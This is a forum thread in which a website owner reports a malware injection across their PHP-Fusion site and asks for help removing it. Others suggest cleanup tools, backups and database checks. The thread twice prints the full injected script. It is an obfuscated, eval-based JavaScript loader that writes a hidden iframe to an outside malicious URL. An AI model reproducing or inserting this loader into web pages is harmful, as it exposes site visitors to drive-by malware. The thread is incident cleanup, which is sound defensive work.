Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.

Injection Issue


Print Track
When trying to access my site at http://www.fredsfollies.com/sports/ today, I am getting the message "Mass Injection Website 5". It seems that it is also affecting any other page on fredsfollies.com

anyone have any idea what has happened?

30 replies

Where does that message appear? I can visit your site without any errors.
The message is from my Norton antivirus and according to my webhost, there has been some code added to many of the files on the website. The code added is the following:

CodeDownload  
<!--569aa9--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          d="doc"+"ument";try{++document.body}catch(q){aa=function(ff){for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-12);}};};ps="split";e=(eval);v="0x";a=0;z="y";try{;}catch(zz){a=1}if(!a){try{++e(d)["\x62od"+z]}catch(q){a2="_";}z="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_75_81_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_75_81_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_83_83_83_3a_6f_74_7e_75_7f_80_7b_7c_74_71_7e_78_83_71_6e_7f_80_71_7e_3a_6f_7b_79_3b_62_70_83_5a_44_72_59_56_3a_7c_74_7c_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_75_81_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_75_81_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_75_81_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_75_81_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);za="";aa("fromCharCode");zaz=za;e(zaz);}</script><!--/569aa9-->



I have changed the password to get to the files and have started deleting the code from the files.
Does anyone know of an editor that will allow a large amount of code in the find/replace so that I can delete this code in all files at once?
I use Notepad++ but I'm not sure how much data you need to find/replace.
That is what I am using but the data I need to find/replace is too big for the program. The data in question can be found in post #3
I was able to paste the line of code from post #3 into the find box no problem. Also pasted it in to the replace box as well.
Evidently I don't know how to use the program then as I have not been able to get it to work.
Perhaps the code in post #3 is not the full code. Here is the full data.

CodeDownload  
<!--569aa9--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          d="doc"+"ument";try{++document.body}catch(q){aa=function(ff){for(i=0;i<z.length;i++){za+=String[ff](e(v+(z[i]))-12);}};};ps="split";e=(eval);v="0x";a=0;z="y";try{;}catch(zz){a=1}if(!a){try{++e(d)["\x62od"+z]}catch(q){a2="_";}z="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_75_81_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_75_81_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_83_83_83_3a_6f_74_7e_75_7f_80_7b_7c_74_71_7e_78_83_71_6e_7f_80_71_7e_3a_6f_7b_79_3b_62_70_83_5a_44_72_59_56_3a_7c_74_7c_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_75_81_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_75_81_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_75_81_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_75_81_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_75_81_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);za="";aa("fromCharCode");zaz=za;e(zaz);}</script><!--/569aa9-->

Quote

afoster wrote:

Evidently I don't know how to use the program then as I have not been able to get it to work.


Download the latest version.

Open your file, press Ctrl+F
Press the "Replace" tab near the top of the popup box.
Paste your code into "Find what"
Paste your code into "Replace with"
Press the "Replace" button on the right.

I copied and paste the code from your latest post into find and replace no problem.
I must have a setting wrong because when I follow your instructions, the data I enter in the Find what and replace with says that it can't find the data I am searching for. The reason is because it does not contain the whole data. Is there a setting within Notepad++ that I need to change?
@afoster, you may find Texcrawler to be helpful. Download it from http://www.digitalvolcano.co.uk/textcrawler.html

Have you alerted your host (if you use a hosting company) to the issue? The reason I ask is because if there is a server vulnerability, your site will just become reinfected over and over. I had that experience and the host wouldn't attend to the issue, so I had to move my site to a more security minded host.

I also had this issue a few months ago with my current host, but in that case, it was because of some script vulnerabilities I had with an old classic asp script I had on my site elsewhere. I had to delete all of that and tighten up all of my folder permissions. I converted my site to SSL, also. I used an uninfected backup to restore my site.

It is a good idea to set your site to do regular automated backsups, so if/when malicious code injections happen, you can revert to non-infected site code without having to manually remove it. Be aware that the malicious users may also have put code into your database, so automatic db backups are a good idea also. Scan your database for malicious code. You may want to change your database passwords.

(Just my two cents worth, in case any of this may be helpful to someone on down the line.)
Thanks for the tips...yes I have alerted the host. Their tech support told me about the code in the files so they are aware of it. I noticed this yesterday afternoon (Pacific time) and so far I have not seen any other signs of it.

I have updates of the database, about every two days...what would I be looking for in that instance?

I will download your Textcrawler software and see if that helps as I have a lot of files (other than ph-fusion files that have been infected.
Check for people who may have been made php-fusion admins without your knowledge. Check your custom pages' code, which will be in the database, for unauthorized changes. Using phpmyadmin, you can search for ".js" in your database to help discover malicious code inserted into it.
Thanks again. I checked for newly assigned admins (none), nothing in the custom pages code and have changed the password to get into the mysql db.

Hopefully once I have removed the code from all of the files on the site, I will be OK. Do you know if the Texcrawler software checks for online files?
No, local files only.
there are PHP scripts that will search for strings in online files -- easy enough to write one too
Easy if you know how to do it, which I don't. I will search for php scripts that will search for strings but I am afraid that the string is too long.

I tried using the Texcrawler and in both instances I got a Not responding when trying to search for the string. I don't know if it is caused by the length of the string or the program is not working properly. I am running it on a Vista machine which I believe should not be a problem.
Just search for the beginning parts of the malicious code. Actually, all you need is to search for ".js" (without the quote marks) -- some of the results, such as jquery, will be legit, and some may not. If your case is typical, the js document writes iframes that link to malicious downloads. And there may be a different iframe link for each one, as it is likely they were inserted by a bot. So, searching for the entire string would not be helpful anyhow.
As far as I can tell, the code is inserted in php, htm, html, txt, and js files and looks the same in all files. I will be honest and say that I did not compare the code from file to file but it is the same length and starts and ends with the <!--569aa9--> code

Therefore searching for ".js" as you suggest would not help me unless I misunderstand what you are saying.
author afoster
forumSecurity Issues & Announcements - 8
replies31 posts
viewed14,055 times
activeLast updated on 6 years ago
You can view all discussion threads in this forum.
You cannot set up a bounty in this discussion thread.
You can start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You can download attachments in this forum.
You cannot up or down-vote on the post in this discussion thread.
Users who participated in discussion: Falk, Ken, Ralph68, afoster, MarcusG, ImproperUsername